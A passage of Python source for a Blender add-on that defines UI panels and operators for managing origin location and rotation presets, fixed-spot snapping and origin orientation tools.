{'z+':sot.rem_zp,'z-':sot.rem_zn,'y+':sot.rem_yp,'y-':sot.rem_yn,'x+':sot.rem_xp,'x-':sot.rem_xn}\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\tset_rot = row.operator('fgt.sot_set_origin_loc_rot', icon='ORIENTATION_GIMBAL', text='Set Origin Orientation')\n\t\tset_rot.prm_set_loc_rot = 'Rot'\n\t\tset_rot.prm_set_act_bat = sot.loc_rot_active_batch\n\t\tset_rot.prm_set_rotation = mu.Vector((sot.rot_x,sot.rot_y,sot.rot_z))\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_x'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = '+rot_x'\n\t\trow.prop(sot, 'rot_x', text= 'X')\n\t\trow.operator(clear, icon='X' if sot.rot_x != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_x'\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_y'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = '+rot_y'\n\t\trow.prop(sot, 'rot_y', text= 'Y')\n\t\trow.operator(clear, icon='X' if sot.rot_y != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_y'\n\t\trow = col.row(align=True)\n\t\trow.operator(rotate, icon='LOOP_FORWARDS', text='')\t\t\t\t\t\t\t\t\t.rop = '-rot_z'\n\t\trow.operator(rotate, icon='LOOP_BACK', text='')\t\t\t\t\t\t\t\t\t.rop = '+rot_z'\n\t\trow.prop(sot, 'rot_z', text= 'Z')\n\t\trow.operator(clear, icon='X' if sot.rot_z != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'rot_z'\n\n\t\trow = col.row(align=True)\n\t\trow.operator(get, icon='PIVOT_CURSOR', text='Get Cursor')\t\t\t\t\t\t\t.prm_get_transform = 'rot_c'\n\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Get Active')\t\t\t\t\t\t\t.prm_get_transform = 'rot_a'\n\t\tnot_zero = True if sot.rot_x != 0 or sot.rot_y != 0 or sot.rot_z != 0 else False\n\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t\t.cop = 'multi rot_x rot_y rot_z'\n\n\t\trow = col.row(align=True)\n\t\tif sot.z_rem:\n\n\t\t\t#row.label(text= 'Z+ remap to:')\n\t\t\trow.prop(sot, 'z_rem', text= 'Z+ remap to:', toggle= True)\n\t\t\trow.prop(sot, 'z_axis', text= '')\n\t\t\trow.operator(clear, icon='X' if sot.z_axis != 'z+' else 'DOT', text='')\t\t\t\t.cop = 'z_axis'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, zax_dic.get(sot.z_axis), text= '')\n\t\t\trow.operator(clear, icon='X' if rem_dic.get(sot.z_axis) != '1' else 'DOT', text='').cop = zax_dic.get(sot.z_axis)\n\t\telse:\n\t\t\trow.prop(sot, 'z_rem', text= 'Remap Z+ axis', toggle= True)\n\n\n\n\nclass SOT_PT_Presets(bpy.types.Panel):\n\tbl_label = 'Presets'\n\tbl_idname = 'SOT_PT_Presets'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\trow.operator('fgt.sot_preset_add', text='Loc/Rot', icon='IMPORT')\n\t\trow.operator('fgt.sot_preset_add_cursor', text='Cursor', icon='PIVOT_CURSOR')\n\t\trow.operator('fgt.sot_preset_add_active', text='Active', icon='PIVOT_ACTIVE')\n\n\t\tif pr_values != {}:\n\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator('fgt.sot_preset_get', text='Loc/Rot', icon='EXPORT')\t\t\t\t\t\t\t.prm_preset_get = 'both'\n\t\t\trow.operator('fgt.sot_preset_get', text='Loc', icon='EXPORT')\t\t\t\t\t\t.prm_preset_get = 'loc'\n\t\t\trow.operator('fgt.sot_preset_get', text='Rot', icon='EXPORT')\t\t\t\t\t\t.prm_preset_get = 'rot'\n\t\t\tcol.separator(factor=1)\t\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_rot_presets', text = '')\n\t\t\trow.operator('fgt.sot_preset_rem', text='', icon='X' if len(pr_values) != 0 else 'DOT')\n\n\t\t\trow = col.row(align=True)\n\t\t\trow.operator('fgt.sot_preset_ren', text='Rename', icon='EVENT_R')\n\t\t\trow.operator('fgt.sot_preset_rrd', text='Up', icon='TRIA_UP')\t\t\t\t\t\t\t.reorder_up = True\n\t\t\trow.operator('fgt.sot_preset_rrd', text='Down', icon='TRIA_DOWN')\t\t\t\t\t\t.reorder_up = False\t\n\t\t\tcol.prop(sot, 'draw_loc_rot_presets', text= 'Hide Preset Visuals' if sot.draw_loc_rot_presets else 'Show Preset Visuals', icon= 'GRID')\n\n\t\t\ti = sot.loc_rot_presets\n\t\t\tv = pr_values.get(i)\n\t\t\tcol.label(text= str(list(pr_values.keys()).index(i)+1) + '/' + str(len(pr_values)) + ' : ' + i)\n\t\t\tcol.label(text= 'Loc ( X ' + str(round(v[0][0],5)) + ' | Y ' + str(round(v[0][1],5)) + ' | Z ' + str(round(v[0][2],5)) + ' )' )\n\t\t\tcol.label(text= 'Rot ( X ' + str(round(math.degrees(v[1][0]),5)) + ' | Y ' + str(round(math.degrees(v[1][1]),5)) + ' | Z ' + str(round(math.degrees(v[1][2]),5)) + ' )' )\n\n\nclass SOT_PT_Fixed_Snap(bpy.types.Panel):\n\tbl_label = 'Fixed Spots Snap'\n\tbl_idname = 'SOT_PT_Fixed_Snap'\n\tbl_space_type = 'VIEW_3D'\n\tbl_region_type = 'UI'\n\tbl_category = 'FGT'\n\tbl_parent_id = 'SOT_PT_Panel'\n\tbl_options = {'DEFAULT_CLOSED'}\n\n\tdef draw(self, context):\n\t\tsot = context.scene.sot_props\n\t\tclear = 'fgt.sot_clear_value'\n\t\tget = 'fgt.sot_get_transform'\n\t\tset_pick_operator = 'fgt.sot_fixed_snap' if sot.spot_set_pick == '1' else 'fgt.sot_fixed_spot_pick'\n\t\tsmode = True if sot.spot_set_pick == '1' else False\n\n\t\tlayout = self.layout\n\t\tcol = layout.column(align=True)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_pick', icon='TRANSFORM_ORIGINS', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_pick', icon='EXPORT', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_mode', icon='DOT', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_mode', icon='STICKY_UVS_LOC', value= '2')\n\t\tif sot.spot_set_pick == '1':\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop_enum(sot, 'spot_set_mode', icon='PARTICLE_DATA', value= '3')\n\t\t\trow.prop_enum(sot, 'spot_set_mode', icon='STICKY_UVS_DISABLE', value= '4')\n\t\t\tif sot.spot_set_mode == '3' or sot.spot_set_mode == '4':\n\t\t\t\t row = col.row(align=True)\n\t\t\t\t row.prop(sot, 'spot_set_not_active', text= 'Exclude Active', icon= 'CANCEL', toggle= True)\t\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '2')\n\t\trow.prop_enum(sot, 'spot_set_axis', value= '3')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_dir', icon='ADD', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_dir', icon='REMOVE', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_GLOBAL', value= '1')\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_LOCAL', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_VIEW', value= '3')\n\t\trow.prop_enum(sot, 'spot_set_space', icon='ORIENTATION_CURSOR', value= '4')\n\n\t\tpreset_mat = 'From ' + sot.loc_rot_presets if pr_values != {} else 'Presets List Empty'\n\t\trow = col.row(align=True)\n\t\trow.enabled = True if pr_values != {} else False\n\t\trow.prop_enum(sot, 'spot_set_space', icon='EMPTY_AXIS', text=preset_mat, value= '5')\n\t\tif sot.spot_set_space == '5' and pr_values != {}:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'loc_rot_presets', text = '')\n\t\t\trow.prop(sot, 'draw_loc_rot_presets', text= '', icon= 'GRID')\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\tnp = row.operator(set_pick_operator, icon='TRIA_UP', text='')\n\t\tnp.prm_spt_mode, np.prm_not_active, np.prm_spt_axis, np.prm_spt_dir, np.prm_spt_space, np.prm_spt_spot = spt_prms(sot,'np')\n\t\tcp = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tcp.prm_spt_mode, cp.prm_not_active, cp.prm_spt_axis, cp.prm_spt_dir, cp.prm_spt_space, cp.prm_spt_spot = spt_prms(sot,'cp')\n\t\tpp = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tpp.prm_spt_mode, pp.prm_not_active, pp.prm_spt_axis, pp.prm_spt_dir, pp.prm_spt_space, pp.prm_spt_spot = spt_prms(sot,'pp')\n\t\tbom = row.operator(set_pick_operator, icon='KEYTYPE_BREAKDOWN_VEC', text='Border Mesh')\n\t\tbom.prm_spt_mode, bom.prm_not_active, bom.prm_spt_axis, bom.prm_spt_dir, bom.prm_spt_space, bom.prm_spt_spot = spt_prms(sot,'bom')\n\n\t\trow = col.row(align=True)\n\t\tnc = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tnc.prm_spt_mode, nc.prm_not_active, nc.prm_spt_axis, nc.prm_spt_dir, nc.prm_spt_space, nc.prm_spt_spot = spt_prms(sot,'nc')\n\t\tcc = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tcc.prm_spt_mode, cc.prm_not_active, cc.prm_spt_axis, cc.prm_spt_dir, cc.prm_spt_space, cc.prm_spt_spot = spt_prms(sot,'cc')\n\t\tpc = row.operator(set_pick_operator, icon='KEYFRAME', text='')\n\t\tpc.prm_spt_mode, pc.prm_not_active, pc.prm_spt_axis, pc.prm_spt_dir, pc.prm_spt_space, pc.prm_spt_spot = spt_prms(sot,'pc')\n\t\tboc = row.operator(set_pick_operator, icon='KEYTYPE_EXTREME_VEC', text='Bound Center')\n\t\tboc.prm_spt_mode, boc.prm_not_active, boc.prm_spt_axis, boc.prm_spt_dir, boc.prm_spt_space, boc.prm_spt_spot = spt_prms(sot,'boc')\n\n\t\trow = col.row(align=True)\n\t\tnn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tnn.prm_spt_mode, nn.prm_not_active, nn.prm_spt_axis, nn.prm_spt_dir, nn.prm_spt_space, nn.prm_spt_spot = spt_prms(sot,'nn')\n\t\tcn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tcn.prm_spt_mode, cn.prm_not_active, cn.prm_spt_axis, cn.prm_spt_dir, cn.prm_spt_space, cn.prm_spt_spot = spt_prms(sot,'cn')\n\t\tpn = row.operator(set_pick_operator, icon='HANDLETYPE_VECTOR_VEC', text='')\n\t\tpn.prm_spt_mode, pn.prm_not_active, pn.prm_spt_axis, pn.prm_spt_dir, pn.prm_spt_space, pn.prm_spt_spot = spt_prms(sot,'pn')\n\t\tcom = row.operator(set_pick_operator, icon='KEYTYPE_KEYFRAME_VEC', text='Center Of Mass')\n\t\tcom.prm_spt_mode, com.prm_not_active, com.prm_spt_axis, com.prm_spt_dir, com.prm_spt_space, com.prm_spt_spot = spt_prms(sot,'com')\n\t\tcol.separator(factor=1)\n\n\t\trow = col.row(align=True)\n\t\tdtp = row.operator(set_pick_operator, icon='TRIA_DOWN_BAR', text='Drop To')\n\t\tdtp.prm_spt_mode, dtp.prm_not_active, dtp.prm_spt_axis, dtp.prm_spt_dir, dtp.prm_spt_space, dtp.prm_spt_spot, dtp.prm_drp_m, dtp.prm_drp_sm, \\\n\t\t\tdtp.prm_drp_off, dtp.prm_drp_czpb, dtp.prm_drp_czpv = spt_prms(sot,'dtp_b',True)\n\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'drop_to_mode', icon='SNAP_PERPENDICULAR', value= '1')\n\t\trow.prop_enum(sot, 'drop_to_mode', icon='SNAP_FACE_CENTER', value= '2')\n\t\trow = col.row(align=True)\n\t\trow.prop_enum(sot, 'drop_to_smode', icon='EMPTY_AXIS' if sot.drop_to_mode == '1' else 'MOD_EDGESPLIT', value= '1', text= 'Zero' if sot.drop_to_mode == '1' else 'Side')\n\t\trow.prop_enum(sot, 'drop_to_smode', icon='NLA_PUSHDOWN' if sot.drop_to_mode == '1' else 'ALIGN_MIDDLE', value= '2')\n\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'drop_to_offset', text= 'Offset')\n\t\trow.operator(clear, icon='X' if sot.drop_to_offset != 0 else 'DOT', text='')\t\t\t\t.cop = 'drop_to_offset'\n\t\tif sot.drop_to_mode == '1' and sot.drop_to_smode == '1':\n\t\t\tcol.prop(sot, 'drop_custom_zero', text= 'Custom Zero Point', toggle= True)\n\t\t\tif sot.drop_custom_zero:\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.prop(sot, 'czp_x', text= 'X') \t\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_x != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_x'\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.prop(sot, 'czp_y', text= 'Y')\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_y != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_y'\n\t\t\t\trow = col.row(align=True)\t\t\t\n\t\t\t\trow.prop(sot, 'czp_z', text= 'Z')\n\t\t\t\trow.operator(clear, icon='X' if sot.czp_z != 0 else 'DOT', text='')\t\t\t\t\t.cop = 'czp_z'\n\t\t\t\trow = col.row(align=True)\n\t\t\t\temb = True if pr_values != {} else False\n\t\t\t\trow.operator(get, icon='EMPTY_AXIS', text='Preset', emboss= emb)\t\t\t\t\t.prm_get_transform = 'czp_p'\n\t\t\t\trow.operator(get, icon='PIVOT_CURSOR', text='Cursor')\t\t\t\t\t\t\t\t.prm_get_transform = 'czp_c'\n\t\t\t\trow.operator(get, icon='PIVOT_ACTIVE', text='Active')\t\t\t\t\t\t\t\t.prm_get_transform = 'czp_a'\n\t\t\t\tnot_zero = True if sot.czp_x != 0 or sot.czp_y != 0 or sot.czp_z != 0 else False\n\t\t\t\trow.operator(clear, icon='X' if not_zero else 'DOT', text='')\t\t\t\t\t\t.cop = 'multi czp_x czp_y czp_z'\n\n\t\tcol.separator(factor=1)\n\t\trow = col.row(align=True)\n\t\trow.prop(sot, 'draw_spots', text= 'Hide Visuals' if sot.draw_spots else 'Show Visuals', \n\t\t\ticon='RADIOBUT_OFF' if not sot.draw_spots else 'RADIOBUT_ON', toggle= True)\n\t\tif sot.draw_spots:\n\t\t\trow.prop(sot, 'draw_spots_recalc', text= 'Refresh', icon='FILE_REFRESH', toggle= True)\n\t\tif sot.draw_spots:\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'draw_spots_scale', text= 'Spots Scale')\n\t\t\trow.operator(clear, icon='X' if sot.draw_spots_scale != 1 else 'DOT', text='')\t\t\t.cop = 'draw_spots_scale'\n\t\t\trow = col.row(align=True)\n\t\t\trow.prop(sot, 'draw_opt_bndc', icon='CUBE', text= 'Cage')\n\t\t\trow.prop(sot, 'draw_opt_bnds', icon='GROUP_VERTEX', text= 'Spots')\n\t\t\trow.prop(sot, 'draw_opt_dtpl', icon='TRACKING_BACKWARDS_SINGLE', text= 'Drop')\n\n\n\n\n\n\n# OPERATORS------------------------------------------------------------------------------------------------------\n\n\n\n\n\n\nclass SOT_OT_Preset_Ren(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_ren'\n\tbl_label = 'Rename'\n\tbl_description = 'Rename selected item (if name is not unique - numbering will be assigned)'\n\n\tprm_new_name: bpr.StringProperty(name = '', default= 'New Name')\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\t\tnew_name = self.prm_new_name\n\t\tnew_values = {}\n\t\tglobal pr_values\n\n\t\tif new_name == '': return report(self,'Please enter at least something')\n\n\t\tfor k,v in pr_values.items():\n\t\t\tif k != sot.loc_rot_presets: \n\t\t\t\tnew_values[k] = v\n\t\t\telse: \n\t\t\t\tnew_name = unic_name_geterator(new_name,pr_values.keys(),True,sot.loc_rot_presets)\n\t\t\t\tnew_values[new_name] = v\n\t\tpr_values = new_values\n\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\tif pr_values != {}: \n\t\t\tself.prm_new_name = context.scene.sot_props.loc_rot_presets\n\t\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\n\t\telse: return report(self,'Presets list is EMPTY!!!')\t\n\n\nclass SOT_OT_Preset_Add(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add'\n\tbl_label = 'New Preset'\n\tbl_description = 'Save current loc/rot values as preset'\n\n\tprm_name: bpr.StringProperty(name = '', default= 'Preset')\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\t\tname = self.prm_name\n\n\t\tif name == '': return report(self,'Please enter at least something')\t\n\n\t\tname = unic_name_geterator(name,pr_values.keys())\n\t\tlx,ly,lz,rx,ry,rz = sot.loc_x,sot.loc_y,sot.loc_z, sot.rot_x, sot.rot_y, sot.rot_z\n\t\tpr_values[name] = ((round(lx,5),round(ly,5),round(lz,5)),(rx,ry,rz))\n\t\tsot.loc_rot_presets = (list(pr_values.keys())[len(pr_values) - 1])\n\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\n\nclass SOT_OT_Preset_Add_Cursor(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add_cursor'\n\tbl_label = 'New Preset From Cursor'\n\tbl_description = 'Create preset from current 3D Cursor location/rotation'\n\n\tdef execute(self, context):\n\t\tbpy.ops.fgt.sot_get_transform(prm_get_transform= 'loc_c')\n\t\tbpy.ops.fgt.sot_get_transform(prm_get_transform= 'rot_c')\n\t\tbpy.ops.fgt.sot_preset_add('INVOKE_DEFAULT')\n\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Preset_Add_Active(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_add_active'\n\tbl_label = 'New Preset From Active'\n\tbl_description = 'Create preset from current Active object/element location/rotation'\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tbpy.ops.fgt.sot_preset_add('INVOKE_DEFAULT')\n\n\t\treturn{'FINISHED'}\n\nclass SOT_OT_Preset_Rem(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_rem'\n\tbl_label = 'Remove'\n\tbl_description = 'Remove current item from presets list'\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tif len(pr_values) != 0:\n\t\t\tif list(pr_values.keys()).index(sot.loc_rot_presets) == len(pr_values) - 1:\n\t\t\t\tdel pr_values[sot.loc_rot_presets]\n\t\t\t\tif len(pr_values) != 0:\n\t\t\t\t\tsot.loc_rot_presets = (list(pr_values.keys())[len(pr_values) - 1])\n\t\t\telse:\n\t\t\t\tdel pr_values[sot.loc_rot_presets]\n\n\t\t\tif pr_values == {} and sot.spot_set_space == '5': sot.spot_set_space = '1'\n\n\t\telse: return report(self,'No more items to remove')\n\t\treturn{'FINISHED'}\n\n\tdef invoke(self, context, event):\n\t\treturn context.window_manager.invoke_props_dialog(self, width=150)\t\n\n\nclass SOT_OT_Preset_Rrd(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_rrd'\n\tbl_label = 'Reorder'\n\tbl_description = 'Move current item up/down in presets list (if possible)'\n\n\treorder_up: bpr.BoolProperty()\n\n\tdef execute(self, context):\n\t\tglobal pr_values\n\t\tif pr_values == {}: return report(self,\"Presets list is EMPTY!!!\")\n\t\tsot = context.scene.sot_props\n\t\tind = list(pr_values.keys()).index(sot.loc_rot_presets)\n\t\tnew_pr,ksi,ks = {},[],[]\n\n\t\tif self.reorder_up :\n\t\t\tif ind != 0:\n\t\t\t\tksi = [e for e,i in enumerate(pr_values.keys())]\n\t\t\t\tksi[ind] = ksi[ind]-1\n\t\t\t\tksi[ind-1] = ksi[ind]+1\n\t\t\t\tks = [list(pr_values.keys())[i] for i in ksi]\n\t\t\t\tfor k in ks: new_pr[k] = pr_values.get(k)\n\t\t\t\tpr_values = new_pr\n\t\t\t\tsot.loc_rot_presets = ks[ind-1]\n\t\t\telse: return report(self,\"Can't move this item UP!!!\")\n\t\telse:\n\t\t\tif ind != len(pr_values) - 1:\n\t\t\t\tksi = [e for e,i in enumerate(pr_values.keys())]\n\t\t\t\tksi[ind] = ksi[ind]+1\n\t\t\t\tksi[ind+1] = ksi[ind]-1\n\t\t\t\tks = [list(pr_values.keys())[i] for i in ksi]\n\t\t\t\tfor k in ks: new_pr[k] = pr_values.get(k)\n\t\t\t\tpr_values = new_pr\n\t\t\t\tsot.loc_rot_presets = ks[ind+1]\n\t\t\telse: return report(self,\"Can't move this item DOWN!!!\")\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Preset_Get(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_preset_get'\n\tbl_label = 'Get Values'\n\tbl_description = 'Get values from preset'\n\n\tprm_preset_get: bpr.EnumProperty(items= [('loc','Get Location','',1),('rot','Get Rotation','',2),('both','Get Location And Rotation','',3)])\n\n\n\tdef execute(self, context):\n\t\tsot = context.scene.sot_props\n\n\t\tif pr_values == {}:\n\t\t\treturn report(self,\"Presets list is EMPTY!!!\")\n\t\telse:\n\t\t\tif self.prm_preset_get == 'loc': sot.loc_x,sot.loc_y,sot.loc_z = pr_values.get(sot.loc_rot_presets)[0] \n\t\t\telif self.prm_preset_get == 'rot': sot.rot_x, sot.rot_y, sot.rot_z = pr_values.get(sot.loc_rot_presets)[1]\n\t\t\telse:\n\t\t\t\tsot.loc_x,sot.loc_y,sot.loc_z = pr_values.get(sot.loc_rot_presets)[0] \n\t\t\t\tsot.rot_x, sot.rot_y, sot.rot_z = pr_values.get(sot.loc_rot_presets)[1]\t\n\t\treturn{'FINISHED'}\n\n\nclass SOT_OT_Set_Loc_Rot(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_set_origin_loc_rot'\n\tbl_label = 'Set Origin Transforms'\n\tbl_description = 'Set origin location/orientation'\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\tprm_set_loc_rot:\tbpr.EnumProperty(name= 'Set Origin', items= [('Loc','Location','',1),('Rot','Rotation','',2),('Loc + Rot','Location + Rotation','',3)])\n\tprm_set_act_bat: \tbpr.EnumProperty(name= 'Set Mode', items= [('1','Active','',1),('2','Batch','',2)])\n\tprm_set_location:\tbpr.FloatVectorProperty(name= 'Location', subtype= 'XYZ_LENGTH', unit= 'LENGTH', precision= 6)\n\tprm_set_rotation:\tbpr.FloatVectorProperty(name= 'Rotation', subtype= 'EULER', soft_min= -360.0, soft_max= 360.0)\n\n\tdef execute(self,context):\n\t\tbob = bpy.ops.object\n\t\tsot = context.scene.sot_props\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\taob = bcv.objects.active\n\t\tsob = bco.selected_objects\n\t\toob = sob\n\t\taob_r = aob\n\t\tsob_r = sob\n\t\tloc_rot = self.prm_set_loc_rot\n\n\t\txl,yl,zl = self.prm_set_location\n\t\txr,yr,zr = self.prm_set_rotation[:]\n\n\t\teob = object_in_edit(bob,sob_r)\n\n\t\tif self.prm_set_act_bat == '1':\n\t\t\tif aob == None: return report(self,'No ACTIVE object in selection!!!!')\n\t\t\tif loc_rot == 'Loc' or loc_rot == 'Loc + Rot': set_origin_location(xl,yl,zl,aob,bcv)\n\t\t\tif loc_rot == 'Rot' or loc_rot == 'Loc + Rot': set_origin_orientation(xr,yr,zr,aob,bcv,bob)\n\t\telse:\n\t\t\tif sob_r == []: return report(self,'No SELECTED objects!!!!')\n\t\t\tfor tob in sob_r:\n\t\t\t\tif loc_rot == 'Loc' or loc_rot == 'Loc + Rot': set_origin_location(xl,yl,zl,tob,bcv,oob)\n\t\t\t\tif loc_rot == 'Rot' or loc_rot == 'Loc + Rot': set_origin_orientation(xr,yr,zr,tob,bcv,bob)\n\n\t\trecover_edit(eob,bcv,aob_r,sob_r)\n\n\t\treturn {'FINISHED'}\n\n\nclass SOT_OT_Get_Transform(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_get_transform'\n\tbl_label = 'SOT_OT_Get_Transform'\n\tbl_description = 'Get transform values from...'\n\n\tprm_get_transform:\tbpr.EnumProperty(name= 'Get Transform', items= [\n\t\t('loc_c','Cursor','',1),('loc_a','Active','',2),\n\t\t('rot_c','Cursor','',3),('rot_a','Active','',4),\n\t\t('lr_c','Cursor','',5),('lr_a','Active','',6),\n\t\t('czp_p','Preset','',7),('czp_c','Cursor','',8),('czp_a','Active','',9)])\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\t\tgtr = self.prm_get_transform\n\t\tbco = bpy.context\n\t\tbcv = bco.view_layer\n\t\taob = bcv.objects.active\n\n\t\tif gtr == 'loc_c':\t\t#Get location from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'loc')\n\n\t\telif gtr == 'loc_a':\t\t#Get location from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'loc')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'loc')\n\n\t\telif gtr == 'rot_c':\t\t#Get rotation from Cursor\n\t\t\tset_manual_values(sot, get_cursor_loc_rot(bco,sot,False).to_euler(),'rot')\n\n\t\telif gtr == 'rot_a':\t\t#Get rotation from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,False)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_vectors(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\telif gtr == 'lr_c':\t\t\t# Get Loc/Rot from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'loc')\n\t\t\tset_manual_values(sot, get_cursor_loc_rot(bco,sot,False).to_euler(),'rot')\n\n\t\telif gtr == 'lr_a':\t\t\t# Get Loc/Rot from Active\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'loc')\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,False)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'loc')\n\t\t\t\tvalue = get_element_vectors(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value.to_euler(),'rot')\n\n\t\telif gtr == 'czp_p':\t\t#Get location from Preset\n\t\t\tset_manual_values(sot,get_preset_loc_rot(sot,True),'czp')\n\n\t\telif gtr == 'czp_c':\t\t#Get location from Cursor\n\t\t\tset_manual_values(sot,get_cursor_loc_rot(bco,sot,True),'czp')\n\n\t\telif gtr == 'czp_a':\t\t#Get location from Active Object/Element\n\t\t\tif bco.mode == 'OBJECT':\n\t\t\t\tvalue = get_object_loc_rot(self,bco,sot,True)\n\t\t\t\tif type(value) is not set: set_manual_values(sot,value,'czp')\n\t\t\telif bco.mode == 'EDIT_MESH':\n\t\t\t\tvalue = get_element_loc(self,bco,sot,aob)\n\t\t\t\tif type(value) is not set: set_manual_values(sot, value,'czp')\n\n\t\treturn {'FINISHED'}\n\nclass SOT_OT_Rotate_Ninety(bpy.types.Operator):\n\tbl_idname = 'fgt.sot_rotate_ninety'\n\tbl_label = 'SOT_OT_Rotate_Ninety'\n\tbl_description = 'Rotate orientation around this axis by 90 degrees'\n\n\trop: bpr.StringProperty(name = '', default = '')\n\n\tdef execute(self,context):\n\t\tsot = context.scene.sot_props\n\n\t\teuler = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z),'XYZ')\n\t\trmt = euler.to_matrix()\n\t\trop_dic = {'x':rmt.col[0],'y':rmt.col[1],'z':rmt.col[2],'-':-90, '+':90}\n\t\trmt.rotate(mu.Quaternion(rop_dic.get(self.rop[-1]), math.radians(rop_dic.get(self.rop[0]))))\n\t\tsot.rot_x,sot.rot_y,sot.rot_z = 